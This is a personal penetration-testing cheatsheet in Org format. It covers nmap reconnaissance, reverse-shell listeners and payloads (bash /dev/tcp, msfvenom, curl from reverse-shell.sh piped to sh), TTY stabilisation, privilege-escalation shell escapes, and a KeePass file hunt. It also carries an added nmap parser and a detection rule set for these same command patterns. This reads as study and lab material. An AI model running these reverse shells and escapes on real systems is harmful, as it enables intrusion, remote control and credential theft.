pentesting/Cheatsheet.org
Rh17S15 ad56aad266 links
2025-07-28 09:30:28 +02:00
**** to install:
- magic wormhole
- tldr
- rlwrap
#+BEGIN_SRC bash
sudo apt update --fix-missing && sudo apt install magic-wormhole tealdeer rlwrap
#+END_SRC
**** for keyring
-> if apt fails with a keyring / signature error, refresh the Kali archive keyring:
#+BEGIN_SRC bash
sudo wget https://archive.kali.org/archive-keyring.gpg -O /usr/share/keyrings/kali-archive-keyring.gpg
#+END_SRC
* information gathering
*** nmap
quick ping sweep to find live hosts (replace <network> with e.g. 192.168.1.0):
#+BEGIN_SRC bash
nmap -sn <network>/24
#+END_SRC
to extract just the live IP addresses:
#+BEGIN_SRC bash
# $5 is the IP only when nmap prints no hostname; on "... for host (ip)" lines $5 is the hostname
nmap -sn 192.168.1.0/24 | grep "for " | awk '{print $5}' > ips.txt
#+END_SRC
scan all ports, then run service/version detection and default scripts on the open ones only:
#+BEGIN_SRC bash
# inner scan: every port, keep "open" lines, take the port number, join with commas, drop the trailing comma
nmap -sCV -A -p $(nmap 192.168.1.155 -p- | grep open | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/.$//') 192.168.1.155
#+END_SRC
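The grep/awk/sed pipelines above break as soon as nmap prints a resolved hostname ("Nmap scan report for host (ip)"), because awk's $5 is then the hostname rather than the address. Below is an added example (not code from the cheatsheet) that parses nmap's normal output into a host-to-open-ports map, keeps hosts with no port table so the result doubles as the live-host list, and builds the comma-joined port list that the inner scan feeds to -p. The sample output is constructed, not a real scan, and the parser handles IPv4 addresses only.

```python
"""Parse nmap's normal (human-readable) output into {ip: [open tcp ports]}.

Added example, not part of the cheatsheet. It does what the grep/awk/sed
pipelines do, but copes with "Nmap scan report for host (1.2.3.4)" lines,
where awk's $5 would be the hostname instead of the address. IPv4 only.
"""
import re
from typing import Dict, Iterable, List

# Constructed sample output in nmap's normal format (not a real scan).
SAMPLE_NMAP_OUTPUT = """\
Starting Nmap 7.94 ( https://nmap.org ) at 2025-07-28 09:30 CEST
Nmap scan report for 192.168.1.1
Host is up (0.0010s latency).
Not shown: 998 closed tcp ports (reset)
PORT    STATE SERVICE
53/tcp  open  domain
80/tcp  open  http
Nmap scan report for fileserver.lan (192.168.1.155)
Host is up (0.0023s latency).
Not shown: 997 closed tcp ports (reset)
PORT     STATE    SERVICE
22/tcp   open     ssh
445/tcp  open     microsoft-ds
8080/tcp filtered http-proxy
Nmap scan report for 192.168.1.200
Host is up (0.0040s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.51 seconds
"""

# "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
HOST_RE = re.compile(
    r"^Nmap scan report for (?:(?P<name>\S+) \()?(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\)?$"
)
# "22/tcp   open     ssh"
PORT_RE = re.compile(r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)")


def parse_nmap_output(text: str) -> Dict[str, List[int]]:
    """Map each reported host IP to its open ports (ascending).

    Hosts with no port table (e.g. from a -sn ping sweep) are kept with an
    empty list, so the result doubles as the live-host list. Only ports in
    state "open" count; "filtered" and "closed" lines are skipped.
    """
    hosts: Dict[str, List[int]] = {}
    current = None
    for line in text.splitlines():
        host = HOST_RE.match(line)
        if host:
            current = host.group("ip")
            hosts.setdefault(current, [])
            continue
        port = PORT_RE.match(line)
        if port and current is not None and port.group("state") == "open":
            hosts[current].append(int(port.group("port")))
    for ports in hosts.values():
        ports.sort()
    return hosts


def live_hosts(text: str) -> List[str]:
    """Hostname-safe equivalent of the grep "for " | awk '{print $5}' pipeline."""
    return list(parse_nmap_output(text))


def port_spec(ports: Iterable[int]) -> str:
    """Join ports the way `nmap -p` expects, as the tr/sed pipeline builds it."""
    return ",".join(str(p) for p in sorted(set(ports)))


if __name__ == "__main__":
    for ip, ports in parse_nmap_output(SAMPLE_NMAP_OUTPUT).items():
        print(ip, port_spec(ports) or "(no open ports)")
```

Feed it the output of the first full-port scan (saved with `-oN` or piped in) and use `port_spec()` for the second scan's -p argument; for anything beyond a quick script, nmap's own XML output (`-oX`) is the more robust format to parse.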
*** dirb
#+BEGIN_SRC bash
dirb http://ip
#+END_SRC
**** for Windows
#+BEGIN_SRC bash
nmap --script vuln ip
#+END_SRC
***** for Windows + SMB
#+BEGIN_SRC bash
nmap --script "smb-vuln*" ip
#+END_SRC
* initial access
*** start listener:
#+BEGIN_SRC bash
rlwrap -cAr nc -nlvp 9002
#+END_SRC
*** reverse shell bash:
#+BEGIN_SRC bash
/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1
#+END_SRC
*** reverse shell file:
#+BEGIN_SRC bash
msfvenom -p cmd/unix/reverse_python LHOST=192.168.1.157 LPORT=9002 -f raw -o rev.py
#+END_SRC
-> from revshells.com
*** untested:
Reverse Shell as a Service
1. On your machine:
#+BEGIN_SRC bash
nc -l 1337
# or nc -nlvp 1337 (untested)
#+END_SRC
2. On the target machine:
#+BEGIN_SRC bash
curl https://reverse-shell.sh/yourip:1337 | sh
#+END_SRC
**** reconnecting:
#+BEGIN_SRC bash
while true; do curl https://reverse-shell.sh/yourip:1337 | sh; done
#+END_SRC
* privilege escalation
** always run these:
#+BEGIN_SRC bash
sudo -l
#+END_SRC
if sudo doesn't work:
[[*TTY Spawn Shell]]
**** check cronjobs
#+BEGIN_SRC bash
ls /etc/cron.*
crontab -l
#+END_SRC
** TTY Spawn Shell
***** if sudo still doesn't work
(e.g. it hangs asking for a password because there is no tty) use -S, which reads the password from stdin:
#+BEGIN_SRC bash
sudo -S command
#+END_SRC
Often during pen tests you may obtain a shell without a tty, yet wish to interact further with the system. Here are some commands which will allow you to spawn a tty shell. Obviously some of this will depend on the system environment and installed packages.
*** Python spawn shell
#+BEGIN_SRC bash
python -c 'import pty; pty.spawn("/bin/bash")'
#+END_SRC
Fully Interactive TTY
**** All the steps to stabilize your shell
**The first step:**
#+BEGIN_SRC bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
#+END_SRC
Which uses Python to spawn a better-featured bash shell. At this point, our shell will look a bit prettier, but we still won't be able to use tab autocomplete or the arrow keys.
**Step two is:**
#+BEGIN_SRC bash
export TERM=xterm
#+END_SRC
This will give us access to term commands such as clear.
**Finally (and most importantly) we will background the shell using**
#+BEGIN_SRC bash
Ctrl + Z
#+END_SRC
Back in our own terminal we use
#+BEGIN_SRC bash
stty raw -echo; fg
#+END_SRC
This does two things: first, stty raw -echo turns off our own terminal echo, which gives us access to tab autocompletes, the arrow keys, and Ctrl + C to kill processes; second, fg brings the backgrounded shell back to the foreground. Finally, tell the remote shell how big the terminal is (take the numbers from stty size run in your own terminal):
#+BEGIN_SRC bash
stty rows 38 columns 116
#+END_SRC
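The detection counterpart to the initial-access and TTY sections, as an added example that is not part of the cheatsheet: a small rule set whose regexes are written against the command lines shown on this page (the /dev/tcp bash shell, curl piped to sh, the pty.spawn and os.system spawners, the interpreter and debugger escapes), run over process-execution records. The record format (pid=/user=/cmd=) and the events are constructed for the example; real auditd or EDR telemetry has its own shape, and for a pipeline launched via sh -c it is the sh process's cmd field that carries the whole pipeline.

```python
"""Flag process command lines matching the reverse-shell and shell-spawn
patterns this cheatsheet lists. Added example, not from the cheatsheet: the
event format ("pid=... user=... cmd=...") is a constructed, simplified record,
not the output of any specific auditd or EDR configuration, and the events
themselves are made up.
"""
import re
from typing import List, Optional, Tuple

EVENT_RE = re.compile(r"^pid=(\d+) user=(\S+) cmd=(.*)$")

# (rule name, regex). Each regex is written against a command from this page.
RULES: List[Tuple[str, re.Pattern]] = [
    ("bash /dev/tcp reverse shell",
     re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("curl piped to shell",
     re.compile(r"\bcurl\b[^|]*\|\s*(?:ba)?sh\b")),
    ("python pty spawn",
     re.compile(r"\bpython3?\b.*\bpty\.spawn\(")),
    ("python os.system shell",
     re.compile(r"\bpython3?\b.*\bos\.system\(.?/bin/(?:ba)?sh")),
    ("interpreter exec shell",
     re.compile(r"\b(?:perl|ruby|lua|irb)\b.*(?:exec|os\.execute)\s*\(?\s*.?/bin/(?:ba)?sh")),
    ("debugger/editor/awk shell escape",
     re.compile(r"\bgdb\b.*-ex\s+.?!sh|\bvim?\b.*:!bash|\bawk\b.*system\(.?/bin/sh")),
]

# Constructed sample events; the command lines are the ones from this page
# plus two benign look-alikes that must not fire.
SAMPLE_EVENTS = [
    'pid=4121 user=www-data cmd=/bin/bash -i >& /dev/tcp/192.168.1.157/9002 0>&1',
    'pid=4122 user=www-data cmd=sh -c curl https://reverse-shell.sh/yourip:1337 | sh',
    'pid=4130 user=www-data cmd=python3 -c import pty;pty.spawn("/bin/bash")',
    'pid=4150 user=root cmd=perl -e exec "/bin/sh";',
    'pid=4160 user=alice cmd=python3 manage.py runserver',
    'pid=4161 user=alice cmd=curl -s https://example.invalid/status.json',
    'pid=4170 user=bob cmd=gdb -nx -ex !sh -ex quit',
]


def parse_event(line: str) -> Tuple[int, str, str]:
    """Split one constructed record into (pid, user, cmd)."""
    m = EVENT_RE.match(line)
    if not m:
        raise ValueError(f"malformed event: {line!r}")
    pid, user, cmd = m.groups()
    return int(pid), user, cmd


def match_rule(cmd: str) -> Optional[str]:
    """Return the name of the first rule that matches the command line, or None."""
    for name, rx in RULES:
        if rx.search(cmd):
            return name
    return None


def scan_events(events: List[str]) -> List[Tuple[int, str, str]]:
    """One (pid, user, rule) finding per matching event, in input order."""
    findings = []
    for line in events:
        pid, user, cmd = parse_event(line)
        name = match_rule(cmd)
        if name is not None:
            findings.append((pid, user, name))
    return findings


if __name__ == "__main__":
    for pid, user, rule in scan_events(SAMPLE_EVENTS):
        print(f"pid={pid} user={user} -> {rule}")
```

The rules are deliberately narrow (they key on the literal shapes above), so treat hits as triage leads rather than verdicts and expect to widen them for obfuscated variants; the benign python3 and curl events show why the shell-pipe and pty.spawn anchors matter for keeping false positives down.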
*** OS system spawn shell
#+BEGIN_SRC bash
python -c 'import os; os.system("/bin/bash")'
#+END_SRC
*** Bash spawn shell
#+BEGIN_SRC bash
/bin/sh -i
#+END_SRC
*** Perl spawn shell
#+BEGIN_SRC bash
perl -e 'exec "/bin/sh";'
#+END_SRC
*** Ruby spawn shell
#+BEGIN_SRC bash
ruby -e 'exec "/bin/sh"'
#+END_SRC
*** Lua spawn shell
#+BEGIN_SRC bash
lua -e 'os.execute("/bin/sh")'
#+END_SRC
*** IRB spawn shell
inside an irb session:
#+BEGIN_SRC bash
exec "/bin/sh"
#+END_SRC
*** VI spawn shell
#+BEGIN_SRC bash
:!bash
#+END_SRC
*** VI(2) spawn shell
#+BEGIN_SRC bash
:set shell=/bin/bash
:shell
#+END_SRC
*** Nmap spawn shell
#+BEGIN_SRC bash
# inside nmap's interactive mode (nmap --interactive), only available in older nmap versions
!sh
#+END_SRC
**** Exiftool
Read metadata:
#+BEGIN_SRC bash
exiftool picture.png
#+END_SRC
Binwalk (extract embedded binary data):
#+BEGIN_SRC bash
binwalk -e picture.png
#+END_SRC
* Windows
*** WinPEAS
https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS
*** LOLBAS
https://lolbas-project.github.io/#
*** WADCOMS
https://wadcoms.github.io/
*** PrivescCheck Script as an alternative to WinPEAS
https://github.com/itm4n/PrivescCheck
*** RUN these while the other scripts are working
#+BEGIN_SRC powershell
whoami /priv
whoami /all
schtasks /query
#+END_SRC
*** for finding kdbx files
https://github.com/ivanmrsulja/keepass2john
#+BEGIN_SRC powershell
Get-ChildItem -Path C:\ -Include *.kdbx -File -Recurse -ErrorAction SilentlyContinue
#+END_SRC
quick Wins Linux:
#+BEGIN_SRC bash
gdb -nx -ex '!sh' -ex quit
sudo mysql -e '! /bin/sh'
strace -o /dev/null /bin/sh
sudo awk 'BEGIN {system("/bin/sh")}'
#+END_SRC
evilwinrm